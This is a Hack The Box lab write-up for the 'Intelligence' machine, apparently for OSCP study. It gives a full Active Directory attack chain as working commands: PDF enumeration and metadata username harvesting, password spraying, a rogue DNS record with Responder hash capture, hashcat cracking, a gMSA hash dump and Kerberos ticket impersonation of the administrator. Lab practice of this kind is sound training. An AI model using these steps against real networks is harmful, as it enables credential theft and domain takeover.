Intelligence - HackMD

# Intelligence ###### tags: `OSCP` https://www.hackthebox.eu/home/machines/profile/357 ![](https://i.imgur.com/Yn4Vqxv.png) First connect to Hack The Box vpn: ``` openvpn {username}.ovpn ``` ![](https://i.imgur.com/2U1WKQP.png) Seems that my machine is `10.10.14.19` Then check the target machine ``` nmap -sS -sV -A -p- -oN NmapIntelligence.txt 10.10.10.248 ``` ![](https://i.imgur.com/yqmzvZG.png) We can found domain name after nmap scan which provide by IIS server. That's add domain name in to hosts. ``` echo 10.10.10.248 dc.intelligence.htb intelligence.htb > /etc/hosts ``` ![](https://i.imgur.com/5ElmENy.png) ![](https://i.imgur.com/QGHG1Qd.png) ![](https://i.imgur.com/X5IGyip.png) ![](https://i.imgur.com/0jDhK7e.png) After quick browse, we found two pdf file link from index page. It's a IIS web service, we can check if it's vuln to the tilde enumeration. ``` git clone https://github.com/irsdl/IIS-ShortName-Scanner.git ./iis_shortname_scanner.jar ``` ![](https://i.imgur.com/bLuLnsa.png) After IIS tild-Enum, we know that there's serveral unlink pdf can be enumerated. Let's create the number list for enum script: ``` seq 1 31 > days.txt seq 1 12 > months.txt ``` Remember to add `0` before the 1~9 units digits. ``` #!/usr/bin/python3 import requests import os with open('days.txt', 'r') as dayList: days = dayList.readlines() with open('months.txt' ,'r') as monthList: months = monthList.readlines() for month in months: for day in days: ret = requests.get(f'http://intelligence.htb/documents/2020-{month.strip()}-{day.strip()}-upload.pdf') if int(ret.status_code) == 200: print(f'[*] Found -- http://intelligence.htb/documents/2020-{month.strip()}-{day.strip()}-upload.pdf') os.system(f"wget -q http://intelligence.htb/documents/2020-{month.strip()}-{day.strip()}-upload.pdf") print(f'[+] Downloading -- http://intelligence.htb/documents/2020-{month.strip()}-{day.strip()}-upload.pdf') ``` ![](https://i.imgur.com/mXXQcUg.png) After we get all accessable .pdf from server, we can try to grep the sensitive information. ``` for f in *.pdf; do pdftotext "$f"; done mkdir txt mv *.txt txt/ cd txt grep -Hn 'account\|username\|password\|passwd' *.txt ``` ![](https://i.imgur.com/XQ7YFUT.png) Trace to the file: `2020-06-04-upload.pdf` ![](https://i.imgur.com/KdkwSE3.png) Here we only find default password of this domain: `NewIntelligenceCorpUser9876` Trace to the file: `2020-12-30-upload.pdf` ![](https://i.imgur.com/pYNGOPj.png) This means that gMSA can be abused if we found any cred can access to the gMSA's password, also, the gMSA might highly potential to have admin privilege to DC server, or moreover, domain admin. Now, we need the username to log into the server with smb, I try to check the metadata of the .pdf files. ``` exiftool 2020-01-01-upload.pdf ``` ![](https://i.imgur.com/YobSvfe.png) Then we found that `Creator` is automatically signed by user. We can grep and modify them to generate a username list for brutalforce the login with default password. ``` exiftool *.pdf | grep Creator | cut -d ':' -f 2 | cut -d ' ' -f 2 > users;cat users ``` ![](https://i.imgur.com/sYh8Q4S.png) Now, we get the username list. Let's use crackmapexec to check the valid credential combination. ``` python3 -m pip install pipx pipx ensurepath pipx install crackmapexec crackmapexec smb 10.10.10.248 -u users -p NewIntelligenceCorpUser9876 ``` ![](https://i.imgur.com/KxafStV.png) Here we found that the valid one's username is `Tiffany.Molina` and password is `NewIntelligenceCorpUser9876` `Impacket` from `SecureAuth` is really recommended to intall with. Then we can use Tiffany's account to interact with smb service. ``` git clone https://github.com/SecureAuthCorp/impacket.git cd impacket python3 setup.py install smbclient.py intelligence.htb/Tiffany.Molina:NewIntelligenceCorpUser9876@10.10.10.248 ``` ![](https://i.imgur.com/SBHwdmb.png) We successfully get the `user.txt` from Tiffany's desktop. Now, we need to dig deeper to find out POE for admin privilege. ![](https://i.imgur.com/GEKVEmZ.png) There's nothing special or unauth to access, we only get `downdetector.ps1` from `IT` share. ``` # Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down" } } catch {} } ``` This script `UseDegfaultCredentials` to request all `web` prefix domain name service status and email to `Ted.Graves` if any service down in every 5 min. As we found in smb `Users` share, There are `Administrator`, `Ted.Graves` and `Tiffany.Molina` login on this server. Tiffany is definatlly not in admin group. We can check whether Ted in admin group or not if we get he cred. Or more lucky, this script run by `Administrator`? Let's add fake dns to the zone with `dnstool`. It's a tool in `https://github.com/dirkjanm/krbrelayx` tool suite. ``` git clone https://github.com/dirkjanm/krbrelayx.git cd krbrelayx ln *.py /usr/local/bin dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'webnotsurprised.intelligence.htb' -d 10.10.14.19 10.10.10.248 ``` ![](https://i.imgur.com/pdsGNta.png) Here the `10.10.14.19` is our kali's IP, then we use `responder` to sniff the cred and wait for 5 minute. ``` responder -I tun0 -A ``` ![](https://i.imgur.com/gHYBmAz.png) ![](https://i.imgur.com/54btmHn.png) Save the hash we get from the `Responder` to text file and use hashcat to crack it. ``` hashcat -m 5600 -a 0 -o cracked.txt --force Hash.txt /usr/share/wordlists/rockyou.txt ``` For NTLMv2, we set `5600` to the hash mode, set `Straight` to attack mode in first try. `--force` will ignore the warning. ![](https://i.imgur.com/EHnPTxs.png) Now we get another valid cred in Intelligence domain. As a IT manager's cred, this cred might be able to access the gMSA. Let's try the `gMSAdumper` which is a tool provide by machine creator: https://github.com/micahvandeusen/gMSADumper ``` gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb ``` ![](https://i.imgur.com/Ta1eLCR.png) Here we get a unlockdown service account and its hash. As a service account and hash, we can request Silver Ticket for any other user in this domain, this means we can use this hash to launch Pass the Ticket attack. Since we’re working with Kerberos, our time has to be within 5 minutes of the Kerberos server time, so set that before we start requesting tickets. ``` net time set -S 10.10.10.248 ``` And to use `getST.py` with `impacket`, we need to get SPN first. ``` python3 pywerview.py get-netcomputer -u svc_int$ --hashes 47e89a6afd68e3872ef1acaf91d0b2f7 -d intelligence.htb -t dc.intelligence.htb --full-data ``` ![](https://i.imgur.com/4jKDnpn.png) Now, all parameters for `getST.py` is set. ``` getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator ``` ![](https://i.imgur.com/F8GgPH7.png) After we get the ticket, we need to export it to $PATH. ``` export KRB5CCNAME=administrator.ccache ``` Then use the admin ticket to Pass the Ticket to `smbclient`. ``` smbclient.py -k intelligence.htb/administrator@dc.intelligence.htb -no-pass ``` ![](https://i.imgur.com/NKoo4i9.png)